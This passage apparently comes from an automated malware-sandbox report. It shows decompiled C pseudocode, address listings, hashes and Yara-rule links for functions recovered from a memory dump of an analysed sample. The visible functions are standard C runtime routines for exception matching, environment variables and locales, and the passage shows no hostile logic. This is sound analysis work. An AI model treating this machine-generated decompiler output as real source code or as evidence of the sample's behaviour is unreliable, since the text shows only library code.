											 *(E0019B22C(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
											_t231 = E0019B22C(_t270, _t275, _t296, _t301, _t315);
											_t275 = _v8;
											 *(_t231 + 0x14) = _v8;
											__eflags = _t315;
											if(_t315 == 0) {
												_t315 = _a8;
											}
											E001995EC(_t275, _t315, _t270);
											E0019BEBD(_a8, _a16, _t301);
											_t234 = E0019C07A(_t301);
											_t332 = _t332 + 0x10;
											_push(_t234);
											E0019BE34(_t270, _t275, _t296, _t301, _t315, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}

0x0019b5a8
0x0019b5af
0x0019b5b1
0x0019b5ba
0x0019b5c0
0x0019b5c8
0x0019b5ca
0x0019b5cd
0x0019b5d3
0x0019b947
0x0019b947
0x0019b94c
0x0019b94e
0x0019b950
0x0019b953
0x0019b954
0x0019b957
0x0019b95d
0x0019ba7c
0x0019b963
0x0019b965
0x0019b96c
0x0019b96f
0x0019b972
0x0019b978
0x0019b97a
0x0019b97f
0x0019b982
0x0019b984
0x0019b98a
0x0019b98c
0x0019b992
0x0019b9a7
0x0019b9ac
0x0019b9af
0x0019b9b1
0x0019ba78
0x00000000
0x0019ba79
0x0019b9b1
0x0019b992
0x0019b98a
0x0019b982
0x0019b9b7
0x0019b9ba
0x0019b9bd
0x0019b9c0
0x0019b9c3
0x0019b9c9
0x0019b9db
0x0019b9e0
0x0019b9e3
0x0019b9e6
0x0019b9e9
0x0019b9ec
0x0019b9ef
0x0019b9f2
0x00000000
0x00000000
0x0019b9f8
0x0019b9f8
0x0019b9fb
0x0019b9fe
0x0019ba0d
0x0019ba0e
0x0019ba0e
0x0019ba10
0x0019ba13
0x00000000
0x00000000
0x0019ba15
0x0019ba18
0x00000000
0x00000000
0x0019ba26
0x0019ba28
0x0019ba2b
0x0019ba2d
0x0019ba35
0x0019ba35
0x0019ba38
0x0019ba3a
0x0019ba3c
0x0019ba58
0x0019ba5d
0x0019ba60
0x0019ba60
0x00000000
0x0019ba38
0x0019ba2f
0x0019ba33
0x00000000
0x00000000
0x00000000
0x0019ba63
0x0019ba66
0x0019ba67
0x0019ba6a
0x0019ba6d
0x0019ba70
0x0019ba73
0x0019ba73
0x00000000
0x0019b9fe
0x0019ba7d
0x0019ba82
0x0019ba83
0x0019ba86
0x0019ba89
0x0019ba8a
0x0019ba8b
0x0019ba8c
0x0019ba8f
0x0019ba91
0x0019bb09
0x0019bb0b
0x0019bb0b
0x0019ba93
0x0019ba93
0x0019ba96
0x0019ba99
0x00000000
0x0019ba9b
0x0019ba9b
0x0019ba9e
0x0019baa1
0x0019baa8
0x0019baa8
0x0019baab
0x0019baad
0x0019baaf
0x0019bae1
0x0019bae1
0x0019bae4
0x0019baeb
0x0019baeb
0x0019baee
0x0019baf1
0x0019baf8
0x0019baf8
0x0019bafb
0x0019bb02
0x0019bb04
0x0019bb04
0x0019bafd
0x0019bafd
0x0019bb00
0x00000000
0x00000000
0x0019bb00
0x0019baf3
0x0019baf3
0x0019baf6
0x00000000
0x00000000
0x0019baf6
0x0019bae6
0x0019bae6
0x0019bae9
0x00000000
0x00000000
0x0019bae9
0x0019bb05
0x0019bab1
0x0019bab1
0x0019bab1
0x0019bab4
0x0019bab4
0x0019bab6
0x0019bab8
0x00000000
0x00000000
0x0019baba
0x0019babc
0x0019bad0
0x0019bad0
0x0019babe
0x0019babe
0x0019bac1
0x0019bac4
0x00000000
0x0019bac6
0x0019bac6
0x0019bac9
0x0019bacc
0x0019bace
0x00000000
0x00000000
0x00000000
0x00000000
0x0019bace
0x0019bac4
0x0019bad9
0x0019bad9
0x0019badb
0x00000000
0x0019badd
0x0019badd
0x0019badd
0x00000000
0x0019badb
0x0019bad4
0x0019bad6
0x0019bad6
0x00000000
0x0019bad6
0x0019baa3
0x0019baa3
0x0019baa6
0x00000000
0x00000000
0x00000000
0x00000000
0x0019baa6
0x0019baa1
0x0019ba99
0x0019bb0c
0x0019bb10
0x0019bb10
0x0019b5e2
0x0019b5e2
0x0019b5eb
0x0019b6e8
0x0019b6e8
0x0019b6eb
0x00000000
0x0019b61a
0x0019b61a
0x0019b61f
0x00000000
0x0019b625
0x0019b625
0x0019b62d
0x0019b8e1
0x0019b8e5
0x0019b633
0x0019b638
0x0019b63b
0x0019b640
0x0019b647
0x0019b64c
0x00000000
0x0019b684
0x0019b68c
0x0019b6f0
0x0019b6f0
0x0019b6f3
0x0019b6f6
0x0019b6f8
0x0019b6fb
0x0019b6fe
0x0019b704
0x0019b8b0
0x0019b8b0
0x0019b8b3
0x00000000
0x0019b8b5
0x0019b8b5
0x0019b8b8
0x00000000
0x0019b8be
0x0019b8be
0x0019b8c1
0x0019b8c4
0x0019b8c5
0x0019b8c6
0x0019b8c9
0x0019b8ca
0x0019b8cd
0x0019b8ce
0x0019b8d3
0x00000000
0x0019b8d3
0x0019b8b8
0x0019b70a
0x0019b70a
0x0019b70e
0x00000000
0x0019b714
0x0019b714
0x0019b71b
0x0019b733
0x0019b733
0x0019b736
0x0019b739
0x0019b73f
0x0019b74f
0x0019b754
0x0019b757
0x0019b75a
0x0019b75d
0x0019b760
0x0019b763
0x0019b766
0x0019b76c
0x0019b76c
0x0019b76f
0x0019b772
0x0019b781
0x0019b782
0x0019b782
0x0019b784
0x0019b787
0x0019b78d
0x0019b790
0x0019b796
0x0019b798
0x0019b79b
0x0019b79e
0x0019b7a4
0x0019b7a7
0x0019b7ac
0x0019b7ac
0x0019b7af
0x0019b7b2
0x0019b7b5
0x0019b7b8
0x0019b7bb
0x0019b7c0
0x0019b7c1
0x0019b7c2
0x0019b7c3
0x0019b7c4
0x0019b7c7
0x0019b7ca
0x0019b7cc
0x00000000
0x0019b7ce
0x0019b7ce
0x0019b7ce
0x0019b7cf
0x0019b7d1
0x0019b7d4
0x0019b7d5
0x0019b7da
0x0019b7dd
0x0019b7df
0x00000000
0x00000000
0x0019b7e1
0x0019b7e4
0x0019b7e5
0x0019b7e8
0x0019b7ea
0x00000000
0x0019b7ec
0x0019b7ec
0x0019b7ef
0x00000000
0x0019b7ef
0x00000000
0x0019b7ea
0x0019b803
0x0019b809
0x0019b826
0x0019b82b
0x0019b82b
0x0019b82e
0x0019b82e
0x00000000
0x0019b7f2
0x0019b7f2
0x0019b7f3
0x0019b7f6
0x0019b7f9
0x0019b7fc
0x0019b7fc
0x00000000
0x0019b801
0x0019b79e
0x0019b790
0x0019b831
0x0019b834
0x0019b835
0x0019b838
0x0019b83b
0x0019b83e
0x0019b841
0x0019b841
0x0019b84a
0x0019b84d
0x0019b84d
0x0019b766
0x0019b850
0x0019b854
0x0019b856
0x0019b859
0x0019b85f
0x0019b85f
0x0019b867
0x0019b86c
0x0019b8d6
0x0019b8d6
0x0019b8db
0x0019b8df
0x00000000
0x00000000
0x00000000
0x00000000
0x0019b86e
0x0019b871
0x0019b874
0x0019b878
0x0019b886
0x0019b888
0x0019b89f
0x0019b8a3
0x0019b8a9
0x0019b8aa
0x0019b8ac
0x00000000
0x0019b8ae
0x00000000
0x0019b8ae
0x00000000
0x00000000
0x00000000
0x0019b87a
0x0019b87a
0x0019b87c
0x00000000
0x0019b87e
0x0019b87e
0x0019b882
0x00000000
0x0019b884
0x0019b88a
0x0019b88f
0x0019b892
0x0019b897
0x0019b89a
0x00000000
0x0019b89a
0x0019b882
0x0019b87c
0x0019b878
0x0019b71d
0x0019b71d
0x0019b724
0x00000000
0x0019b726
0x0019b726
0x0019b72d
0x00000000
0x00000000
0x00000000
0x00000000
0x0019b72d
0x0019b724
0x0019b71b
0x0019b70e
0x0019b68e
0x0019b696
0x0019b699
0x0019b69e
0x0019b6a2
0x0019b6a5
0x0019b6ab
0x0019b6ae
0x00000000
0x0019b6b0
0x0019b6b0
0x0019b6b3
0x0019b6b5
0x0019b8e6
0x0019b8e6
0x00000000
0x0019b6bb
0x0019b6c3
0x0019b6ce
0x00000000
0x00000000
0x0019b6d7
0x0019b6da
0x0019b6db
0x0019b6de
0x0019b6e0
0x00000000
0x0019b6e6
0x00000000
0x0019b6e6
0x00000000
0x0019b6e0
0x0019b6bb
0x0019b8eb
0x0019b8eb
0x0019b8ed
0x0019b8ee
0x0019b8f5
0x0019b8f8
0x0019b906
0x0019b90b
0x0019b910
0x0019b913
0x0019b918
0x0019b91b
0x0019b91e
0x0019b920
0x0019b922
0x0019b922
0x0019b927
0x0019b933
0x0019b939
0x0019b93e
0x0019b941
0x0019b942
0x00000000
0x0019b942
0x0019b6ae
0x0019b68c
0x0019b64c
0x0019b62d
0x0019b61f
0x0019b5eb

APIs

type_info::operator==.LIBVCRUNTIME ref: 0019B6C7
___TypeMatch.LIBVCRUNTIME ref: 0019B7D5
_UnwindNestedFrames.LIBCMT ref: 0019B927
CallUnexpected.LIBVCRUNTIME ref: 0019B942

Strings

csm, xrefs: 0019B6FE
csm, xrefs: 0019B5E5
csm, xrefs: 0019B652

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 0eea2f12bc4148dc96230d8e7aff0223c52f1f8f5fe196cbc9429c4111fd76a7
Instruction ID: 393598a71543f6938f230a41c4b4a23f0a0210983d2bc4edd39563b17dabb222
Opcode Fuzzy Hash: 0eea2f12bc4148dc96230d8e7aff0223c52f1f8f5fe196cbc9429c4111fd76a7
Instruction Fuzzy Hash: F9B17A71C08219EFCF19DFA4EAC19AEBBB9FF18310B15415AE8116B212D734EA51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001AD5D9 Relevance: 12.2, APIs: 8, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E001AD5D9(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				intOrPtr* _t98;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				_t163 = _t146;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E001B33E0(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E0019FD24(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0x1f0cd8 - _t110; // 0xcff6f8
							if(__eflags != 0) {
								L14:
								_t64 =  *0x1f0cd8; // 0xcff6f8
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E001AD8E1(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E001AFEDA(_t120, _t139, 4);
													E001A71B2(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E001A71B2( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E001AFEDA(_t139, _t138, 4);
												E001A71B2(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0x1f0cd8 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E001A58A2(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E001A71B2(_t149);
													goto L40;
												} else {
													_t76 = E001A5138(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E001A016C();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E001A58A2(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E001A24F9(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E001A71B2(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E001A58A2(_t53, 1);
																		E001A71B2(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E001A5138( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E001A016C();
																				asm("int3");
																				_t84 =  *0x1f0cd8; // 0xcff6f8
																				__eflags = _t84 -  *0x1f0ce4; // 0xcff6f8
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0x1f0cd8 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														__eflags = E001B2044(_v20 + 1 + _t149 - _a4, _t139, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														if(__eflags == 0) {
															_t98 = E0019FD24(__eflags);
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0x1f0cd8 = E001A58A2(1, 4);
										E001A71B2(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0x1f0cd8 - _t110; // 0xcff6f8
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0x1f0cdc - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x1f0cdc = E001A58A2(1, 4);
												E001A71B2(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0x1f0cdc - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E001A71B2(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0x1f0cdc - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L001A2FE9();
										if(__eflags == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E0019FD24(_t163);
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}

0x001ad5d9
0x001ad5dc
0x001ad5de
0x001ad5e2
0x001ad5e5
0x001ad5e7
0x001ad5fc
0x001ad601
0x001ad603
0x001ad608
0x001ad60d
0x001ad60f
0x001ad7f0
0x001ad7f5
0x00000000
0x001ad615
0x001ad615
0x001ad617
0x00000000
0x001ad61d
0x001ad620
0x001ad623
0x001ad628
0x001ad62a
0x001ad630
0x001ad6ad
0x001ad6ad
0x001ad6b2
0x001ad6b5
0x001ad6b7
0x00000000
0x001ad6bd
0x001ad6c4
0x001ad6c9
0x001ad6ce
0x001ad6d1
0x001ad6d3
0x001ad724
0x001ad724
0x001ad727
0x00000000
0x001ad72d
0x001ad72d
0x001ad72f
0x001ad732
0x001ad732
0x001ad735
0x001ad737
0x00000000
0x001ad73d
0x001ad73d
0x001ad743
0x00000000
0x001ad749
0x001ad753
0x001ad756
0x001ad75b
0x001ad75e
0x001ad761
0x001ad763
0x00000000
0x001ad769
0x001ad769
0x001ad76c
0x001ad76e
0x001ad771
0x00000000
0x001ad771
0x001ad763
0x001ad743
0x001ad737
0x001ad6d5
0x001ad6d5
0x001ad6d7
0x00000000
0x001ad6d9
0x001ad6dc
0x001ad6e2
0x001ad6e5
0x001ad6e8
0x001ad71d
0x001ad71f
0x001ad6ea
0x001ad6ea
0x001ad6f7
0x001ad6f7
0x001ad6fa
0x00000000
0x00000000
0x001ad6f3
0x001ad6f6
0x001ad6f6
0x001ad6f6
0x001ad706
0x001ad709
0x001ad70e
0x001ad711
0x001ad714
0x001ad716
0x001ad775
0x001ad775
0x001ad775
0x001ad716
0x001ad77a
0x001ad77d
0x00000000
0x001ad77f
0x001ad77f
0x001ad782
0x001ad782
0x001ad784
0x001ad785
0x001ad785
0x001ad791
0x001ad799
0x001ad79c
0x001ad79d
0x001ad79f
0x001ad7e7
0x001ad7e8
0x00000000
0x001ad7a1
0x001ad7a8
0x001ad7ad
0x001ad7b0
0x001ad7b2
0x001ad80c
0x001ad80d
0x001ad80e
0x001ad80f
0x001ad810
0x001ad811
0x001ad816
0x001ad819
0x001ad81d
0x001ad81e
0x001ad821
0x001ad823
0x001ad82a
0x001ad82c
0x001ad82e
0x001ad830
0x001ad832
0x001ad832
0x001ad835
0x001ad836
0x001ad836
0x001ad832
0x001ad83c
0x001ad847
0x001ad84a
0x001ad84b
0x001ad84d
0x001ad8b5
0x001ad8b5
0x00000000
0x001ad84f
0x001ad84f
0x001ad851
0x001ad853
0x001ad8a5
0x001ad8a7
0x001ad8ad
0x00000000
0x001ad855
0x001ad855
0x001ad858
0x001ad858
0x001ad85a
0x001ad85a
0x001ad85a
0x001ad85d
0x001ad85d
0x001ad85f
0x001ad860
0x001ad860
0x001ad868
0x001ad86c
0x001ad876
0x001ad879
0x001ad87e
0x001ad881
0x001ad885
0x00000000
0x001ad887
0x001ad88f
0x001ad894
0x001ad897
0x001ad899
0x001ad8ba
0x001ad8bc
0x001ad8bd
0x001ad8be
0x001ad8bf
0x001ad8c0
0x001ad8c1
0x001ad8c6
0x001ad8c7
0x001ad8cc
0x001ad8d2
0x001ad8d4
0x001ad8d5
0x001ad8db
0x00000000
0x001ad8db
0x001ad8e0
0x00000000
0x00000000
0x00000000
0x001ad899
0x00000000
0x001ad89b
0x001ad89b
0x001ad89e
0x001ad8a0
0x001ad8a0
0x00000000
0x001ad8a4
0x001ad853
0x001ad825
0x001ad825
0x001ad825
0x001ad827
0x001ad829
0x001ad829
0x001ad7b4
0x001ad7c5
0x001ad7c9
0x001ad7d5
0x001ad7d7
0x001ad7d9
0x001ad7de
0x001ad7de
0x001ad7e1
0x001ad7e1
0x00000000
0x001ad7d7
0x001ad7b2
0x001ad79f
0x001ad77d
0x001ad6d7
0x001ad6d3
0x001ad632
0x001ad632
0x001ad635
0x001ad653
0x001ad653
0x001ad656
0x001ad669
0x001ad66e
0x001ad673
0x001ad676
0x001ad67c
0x001ad7fb
0x001ad7fb
0x001ad7fb
0x00000000
0x001ad682
0x001ad682
0x001ad688
0x00000000
0x001ad68a
0x001ad694
0x001ad699
0x001ad69e
0x001ad6a1
0x001ad6a7
0x00000000
0x00000000
0x00000000
0x00000000
0x001ad6a7
0x001ad688
0x001ad658
0x001ad658
0x001ad7fe
0x001ad7ff
0x001ad806
0x00000000
0x001ad808
0x001ad637
0x001ad637
0x001ad63d
0x00000000
0x001ad63f
0x001ad644
0x001ad646
0x00000000
0x001ad64c
0x001ad64c
0x00000000
0x001ad64c
0x001ad646
0x001ad63d
0x001ad635
0x001ad630
0x001ad617
0x001ad5e9
0x001ad5e9
0x001ad5ee
0x001ad5f4
0x001ad809
0x001ad80b
0x001ad80b
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 001AD603
_free.LIBCMT ref: 001AD6DC
_free.LIBCMT ref: 001AD709

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 237353eeeafabc13dc7dcba10f56dd2167aa942c6024aee9bc343abc130a8882
Instruction ID: 8a3355ce5df3025c6b3c261aa7f9aaa41c3c5fb9b8e6de7f85deab0d5d667c82
Opcode Fuzzy Hash: 237353eeeafabc13dc7dcba10f56dd2167aa942c6024aee9bc343abc130a8882
Instruction Fuzzy Hash: 43514A78904A01AFDB25AFB8EC81A7D77F4EF17314F1041ADF51697682EB358941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001A435D Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E001A435D(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t156;
				void* _t163;
				signed int _t164;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t212;
				void* _t213;
				signed int _t220;
				intOrPtr* _t221;
				char* _t228;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int _t240;
				signed int _t241;
				intOrPtr _t246;
				void* _t247;
				void* _t250;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int* _t258;
				short _t259;
				signed int _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_t244 = __edx;
				_t156 =  *0x1c3014; // 0x88921fa2
				_v8 = _t156 ^ _t260;
				_push(__ebx);
				_t212 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v736 = _t212;
				_v732 = E001A5D71(__ecx, __edx) + 0x278;
				_t163 = E001A3A48(_t212, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t263 = _t262 + 0x18;
				if(_t163 == 0) {
					L39:
					_t164 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t212 + 2; // 0x6
					_t252 = _t10 << 4;
					_t166 =  &_v272;
					_v712 = _t252;
					_t244 =  *(_t252 + _t246);
					_t220 = _t244;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t254 = _v712;
						if( *_t166 !=  *_t220) {
							break;
						}
						if( *_t166 == 0) {
							L6:
							_t167 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t166 + 2));
							_v706 = _t259;
							_t254 = _v712;
							if(_t259 !=  *((intOrPtr*)(_t220 + 2))) {
								break;
							} else {
								_t166 = _t166 + 4;
								_t220 = _t220 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t167 != 0) {
							_t221 =  &_v272;
							_t244 = _t221 + 2;
							do {
								_t168 =  *_t221;
								_t221 = _t221 + 2;
								__eflags = _t168 - _v704;
							} while (_t168 != _v704);
							_v708 = (_t221 - _t244 >> 1) + 1;
							_t171 = E001A871A(4 + ((_t221 - _t244 >> 1) + 1) * 2);
							_v724 = _t171;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L39;
							} else {
								_v720 =  *((intOrPtr*)(_t254 + _t246));
								_v740 =  *(_t246 + 0xa0 + _t212 * 4);
								_v744 =  *(_t246 + 8);
								_t228 =  &_v272;
								_v728 = _t171 + 4;
								_t173 = E001AB4FE(_t171 + 4, _v708, _t228);
								_t264 = _t263 + 0xc;
								__eflags = _t173;
								if(_t173 != 0) {
									_t174 = _v704;
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									E001A016C();
									asm("int3");
									_push(_t260);
									_push(_t228);
									_v784 = _v784 & 0x00000000;
									_t177 = E001A84AC(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t177;
									if(_t177 == 0) {
										L49:
										return 0xfde9;
									}
									_t179 = _v12;
									__eflags = _t179;
									if(_t179 == 0) {
										goto L49;
									}
									return _t179;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t254 + _t246)) = _v728;
									if(_v272 != 0x43) {
										L17:
										_t182 = E001A3765(_t212, _t246,  &_v700);
										_t244 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t244 = _v704;
											_t182 = _t244;
										}
									}
									 *(_t246 + 0xa0 + _t212 * 4) = _t182;
									__eflags = _t212 - 2;
									if(_t212 != 2) {
										__eflags = _t212 - 1;
										if(_t212 != 1) {
											__eflags = _t212 - 5;
											if(_t212 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v716;
										}
									} else {
										_t258 = _v732;
										 *(_t246 + 8) = _v716;
										_v708 = _t258[8];
										_t240 = _t258[9];
										_v716 = _t240;
										while(1) {
											__eflags =  *(_t246 + 8) -  *(_t258 + _t244 * 8);
											if( *(_t246 + 8) ==  *(_t258 + _t244 * 8)) {
												break;
											}
											_t210 =  *(_t258 + _t244 * 8);
